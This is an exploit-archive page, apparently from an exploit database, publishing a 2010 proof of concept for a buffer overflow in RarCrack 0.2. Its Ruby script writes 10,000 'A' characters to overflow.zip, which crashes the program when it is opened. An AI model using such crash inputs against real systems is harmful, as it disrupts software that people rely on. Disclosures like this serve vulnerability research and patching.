[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RarCrack 0.2 Buffer Overflow Proof Of Concept
# Published : 2010-09-19
# Author : The_UnKn@wn
# Previous Title : Microsoft DRM Technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
# Next Title : MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
#!/usr/bin/env ruby
# overflow.rb
#
# __________ ____ __ ______ _________
# / ____/ __ / __ / / / / __ / ____< /
# / / __/ /_/ / / / / / / / /_/ /___ / /
# / /_/ / _, _/ /_/ / /_/ / ____/___/ // /
# ____/_/ |_|____/____/_/ /_____//_/
#
#
# Title: RarCrack 0.2 Buffer Overflow POC
# Date: 19.09.2010
# Author: The_UnKn@wn
# Email: the_unknown [at] group51.org
# Twitter: @The_UnKn0wn
# Homepage: http://group51.org
# Software Link: http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download
# Version: 0.2
# Tested on: openSUSE 11.3
# CVE: none
#
# Impact: RarCrack doesn't check the length of the archive and while cracking it crashes.
#
# Usage:
# $ ruby overflow.rb
# $ ./rarcrack overflow.zip
#
text = "A"*10000
File.open("overflow.zip","w") do |l|
l.puts(text)
end